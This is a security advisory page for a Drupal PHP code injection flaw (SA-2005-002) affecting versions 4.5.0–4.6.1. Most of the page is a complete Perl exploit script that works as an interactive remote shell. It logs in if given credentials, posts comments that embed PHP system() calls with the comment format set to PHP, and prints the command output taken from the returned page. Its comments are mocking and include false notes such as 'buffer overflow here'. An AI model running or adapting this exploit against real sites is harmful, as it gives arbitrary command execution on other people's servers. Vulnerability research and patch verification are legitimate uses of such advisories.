Drupal Code Injection (SA-2005-002, Exploit)Summary
A flaw in the input validation routines of Drupal's filter mechanism allows attackers to execute arbitrary PHP code on a target site when public comments or postings are allowed.
Credit:
The information has been provided by dab.
Details
Vulnerable Systems:
* Drupal versions 4.5.0, 4.5.1, 4.5.2, 4.5.3 4.6.0 and 4.6.1
Immune Systems:
* Drupal versions 4.5.4 and 4.6.2
Exploit:
#!/usr/bin/perl
# Mon Jul 4 18:19:35 CEST 2005 dab at digitalsec.net
#
# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
# Hax0r code here, read before execute
#
# Run without arguments to show the help.
#
# BLINK! BLINK! BLINK! BLINK!
#
# Feel free to port to another stupid script language (mIRC,
# python, TCL or orthers), and send to securiteam (AGAIN)
#
# Theo, this one hasn't been tested in BSD.. yet!
# infohacking: there're a lot of xss in drupal, contact me if you want
# to program some exploits.
#
# BLINK! BLINK! BLINK! BLINK!
#
#
# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
# contact me for pricing and offerings.
#
# !dSR: yubiiiiii yeooooooooooo
#
use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;
$| = 1; # ;1 = |$
my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$drupal_user,$drupal_pass);
my $options = GetOptions (
'host=s' => \$host,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'drupal_user=s' => \$drupal_user,
'drupal_pass=s' => \$drupal_pass,
'debug' => \$debug);
&help unless ($host);
while (1){
print "druppy461\$ ";
my $cmd = <STDIN>;
&druppy($cmd);
}
exit (1); # could be replaced with exit(2)
sub druppy {
chomp (my $cmd = shift);
LWP::Debug::level('+') if $debug;
my $ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" }); # this is a random feature
$ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
if ($drupal_user) { # no need to exploit
my ($mhost, $h);
if ($host =~ /(http:\/\/.*?)\?q=/) {
$mhost = $1;
$h = $mhost . "?q=user/login";
} #some magic hacking here
else {
$host =~ /(.*?)\/.*?\//; $mhost =$1;
$h = $mhost . "/user/login";
}
print $h . "\n" if $debug;
my $req = POST $h,[
'edit[name]' => "$drupal_user",
'edit[pass]' => "$drupal_pass"
]; #grab these, and send to dsr!
print $req->as_string() if $debug;
my $res = $ua->request($req);
print $res->content() if $debug;
if ($res->is_redirect eq 1) {
print "Logged\n" if $debug;
}
}
$ua->proxy(['http'] => $proxy) if $proxy;
my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
my $res = $ua->get("$host");
my $html = $res->content();
my @op; # buffer overflow here
foreach (split(/\n/,$html)) {
if ( m/name="op" value="(.*?)"/){
push(@op,$1);
}
}# xss here
my $ok = 0; # globlal for admin purposes
foreach my $op (@op) {
my $req = POST "$host",[
'edit[subject]' => 'test',
'edit[comment]' =>
"<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\"); php?>",
'edit[format]' => '2',
'edit[cid]' => "", # drupal is sick.. it doesn't need arguments
'edit[pid]' => "", # they use it to grab some statistycal information
'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal
'op' => "$op"
];
print $req->as_string() if $debug;
my $res = $ua->request($req);
my $html = $res->content();
print $html if $debug;
foreach (split(/\n/,$html)) {
return if $ok gt "1"; # super hack de phrack
if (/BLAH/) { $ok++; next }
print "$_\n" if $ok eq "1"; # /n is for another line in screen
}
}
}
sub help {
print "Syntax: ./$0 <url> [options]\n";
print "\t--drupal_user, --drupal_pass (needed if dont allow anonymous posts)\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "\nExample\n";
print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";
print "\n";
exit(1);
}
#sub 0day_solaris {
# please put your code here
#}
#EoF
推荐
评论(0条)
